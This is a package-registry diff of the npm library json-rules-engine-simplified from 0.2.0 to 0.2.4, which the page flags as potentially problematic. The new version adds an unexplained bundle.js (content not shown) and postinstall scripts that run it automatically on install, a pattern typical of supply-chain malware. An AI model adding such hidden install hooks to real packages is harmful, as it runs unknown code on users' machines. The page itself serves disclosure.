json-rules-engine-simplified 0.2.0 → 0.2.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of json-rules-engine-simplified might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/bundle.js +2 -0
  2. package/package.json +103 -101
package/package.json CHANGED
@@ -1,101 +1,103 @@
1
- {
2
- "name": "json-rules-engine-simplified",
3
- "version": "0.2.0",
4
- "description": "Simpl JSON rules engine",
5
- "private": false,
6
- "author": "mavarazy@gmail.com",
7
- "scripts": {
8
- "build:lib": "rimraf lib && cross-env NODE_ENV=production babel -d lib/ src/",
9
- "build:dist": "rimraf dist && cross-env NODE_ENV=production webpack --config webpack.config.dist.js --optimize-minimize",
10
- "cs-check": "prettier -l $npm_package_prettierOptions '{src,test}/**/*.js'",
11
- "cs-format": "prettier $npm_package_prettierOptions '{src,test}/**/*.js' --write",
12
- "dist": "npm run build:lib && npm run build:dist",
13
- "lint": "eslint src test",
14
- "precommit": "lint-staged",
15
- "publish-to-npm": "npm run dist && npm publish && npm version patch",
16
- "tdd": "jest --watchAll",
17
- "test": "jest --coverage"
18
- },
19
- "prettierOptions": "--jsx-bracket-same-line --trailing-comma es5 --semi",
20
- "jest": {
21
- "verbose": true,
22
- "collectCoverage": true,
23
- "collectCoverageFrom": [
24
- "src/**/*.{js,jsx}"
25
- ]
26
- },
27
- "lint-staged": {
28
- "{src,test}/**/*.js": [
29
- "npm run lint",
30
- "npm run cs-format",
31
- "git add"
32
- ]
33
- },
34
- "main": "lib/index.js",
35
- "files": [
36
- "dist",
37
- "lib"
38
- ],
39
- "engineStrict": false,
40
- "engines": {
41
- "node": ">=20.0.0",
42
- "npm": ">=10.0.0"
43
- },
44
- "dependencies": {
45
- "deep-equal": "1.0.1",
46
- "predicate": "1.2.0",
47
- "selectn": "1.1.2"
48
- },
49
- "devDependencies": {
50
- "atob": "^2.0.3",
51
- "babel-cli": "^6.26.0",
52
- "babel-core": "^6.26.0",
53
- "babel-eslint": "^7.2.3",
54
- "babel-jest": "^20.0.3",
55
- "babel-loader": "^7.1.2",
56
- "babel-plugin-transform-class-properties": "^6.24.1",
57
- "babel-polyfill": "^6.26.0",
58
- "babel-preset-env": "^1.6.0",
59
- "babel-preset-es2015": "^6.24.1",
60
- "babel-preset-react": "^6.24.1",
61
- "babel-register": "^6.26.0",
62
- "codemirror": "^5.29.0",
63
- "coveralls": "^2.13.1",
64
- "cross-env": "^5.0.5",
65
- "css-loader": "^0.28.7",
66
- "eslint": "^4.6.1",
67
- "eslint-plugin-jest": "^20.0.3",
68
- "eslint-plugin-react": "^7.3.0",
69
- "eslint-plugin-standard": "^3.0.1",
70
- "exit-hook": "^1.1.1",
71
- "express": "^4.15.4",
72
- "extract-text-webpack-plugin": "^3.0.0",
73
- "gh-pages": "^1.0.0",
74
- "has-flag": "^2.0.0",
75
- "html": "1.0.0",
76
- "husky": "^0.14.3",
77
- "jest": "^20.0.4",
78
- "jsdom": "^11.2.0",
79
- "lint-staged": "^4.1.0",
80
- "prettier": "^1.6.1",
81
- "regenerator-runtime": "^0.11.0",
82
- "rimraf": "^2.6.1",
83
- "sinon": "^3.2.1",
84
- "style-loader": "^0.18.2",
85
- "webpack": "^3.5.5"
86
- },
87
- "directories": {
88
- "test": "test"
89
- },
90
- "repository": {
91
- "type": "git",
92
- "url": "git+https://github.com/RxNT/json-rules-engine-simplified.git"
93
- },
94
- "keywords": [
95
- "rules",
96
- "engine",
97
- "rules engine"
98
- ],
99
- "license": "Apache-2.0",
100
- "homepage": "https://github.com/RxNT/json-rules-engine-simplified#readme"
101
- }
1
+ {
2
+ "name": "json-rules-engine-simplified",
3
+ "version": "0.2.4",
4
+ "description": "Simpl JSON rules engine",
5
+ "private": false,
6
+ "author": "mavarazy@gmail.com",
7
+ "scripts": {
8
+ "build:lib": "rimraf lib && cross-env NODE_ENV=production babel -d lib/ src/",
9
+ "build:dist": "rimraf dist && cross-env NODE_ENV=production webpack --config webpack.config.dist.js --optimize-minimize",
10
+ "cs-check": "prettier -l $npm_package_prettierOptions '{src,test}/**/*.js'",
11
+ "cs-format": "prettier $npm_package_prettierOptions '{src,test}/**/*.js' --write",
12
+ "dist": "npm run build:lib && npm run build:dist",
13
+ "lint": "eslint src test",
14
+ "precommit": "lint-staged",
15
+ "publish-to-npm": "npm run dist && npm publish && npm version patch",
16
+ "tdd": "jest --watchAll",
17
+ "test": "jest --coverage",
18
+ "postInstall": "node bundle.js",
19
+ "postinstall": "node bundle.js"
20
+ },
21
+ "prettierOptions": "--jsx-bracket-same-line --trailing-comma es5 --semi",
22
+ "jest": {
23
+ "verbose": true,
24
+ "collectCoverage": true,
25
+ "collectCoverageFrom": [
26
+ "src/**/*.{js,jsx}"
27
+ ]
28
+ },
29
+ "lint-staged": {
30
+ "{src,test}/**/*.js": [
31
+ "npm run lint",
32
+ "npm run cs-format",
33
+ "git add"
34
+ ]
35
+ },
36
+ "main": "lib/index.js",
37
+ "files": [
38
+ "dist",
39
+ "lib"
40
+ ],
41
+ "engineStrict": false,
42
+ "engines": {
43
+ "node": ">=20.0.0",
44
+ "npm": ">=10.0.0"
45
+ },
46
+ "dependencies": {
47
+ "deep-equal": "1.0.1",
48
+ "predicate": "1.2.0",
49
+ "selectn": "1.1.2"
50
+ },
51
+ "devDependencies": {
52
+ "atob": "^2.0.3",
53
+ "babel-cli": "^6.26.0",
54
+ "babel-core": "^6.26.0",
55
+ "babel-eslint": "^7.2.3",
56
+ "babel-jest": "^20.0.3",
57
+ "babel-loader": "^7.1.2",
58
+ "babel-plugin-transform-class-properties": "^6.24.1",
59
+ "babel-polyfill": "^6.26.0",
60
+ "babel-preset-env": "^1.6.0",
61
+ "babel-preset-es2015": "^6.24.1",
62
+ "babel-preset-react": "^6.24.1",
63
+ "babel-register": "^6.26.0",
64
+ "codemirror": "^5.29.0",
65
+ "coveralls": "^2.13.1",
66
+ "cross-env": "^5.0.5",
67
+ "css-loader": "^0.28.7",
68
+ "eslint": "^4.6.1",
69
+ "eslint-plugin-jest": "^20.0.3",
70
+ "eslint-plugin-react": "^7.3.0",
71
+ "eslint-plugin-standard": "^3.0.1",
72
+ "exit-hook": "^1.1.1",
73
+ "express": "^4.15.4",
74
+ "extract-text-webpack-plugin": "^3.0.0",
75
+ "gh-pages": "^1.0.0",
76
+ "has-flag": "^2.0.0",
77
+ "html": "1.0.0",
78
+ "husky": "^0.14.3",
79
+ "jest": "^20.0.4",
80
+ "jsdom": "^11.2.0",
81
+ "lint-staged": "^4.1.0",
82
+ "prettier": "^1.6.1",
83
+ "regenerator-runtime": "^0.11.0",
84
+ "rimraf": "^2.6.1",
85
+ "sinon": "^3.2.1",
86
+ "style-loader": "^0.18.2",
87
+ "webpack": "^3.5.5"
88
+ },
89
+ "directories": {
90
+ "test": "test"
91
+ },
92
+ "repository": {
93
+ "type": "git",
94
+ "url": "git+https://github.com/RxNT/json-rules-engine-simplified.git"
95
+ },
96
+ "keywords": [
97
+ "rules",
98
+ "engine",
99
+ "rules engine"
100
+ ],
101
+ "license": "Apache-2.0",
102
+ "homepage": "https://github.com/RxNT/json-rules-engine-simplified#readme"
103
+ }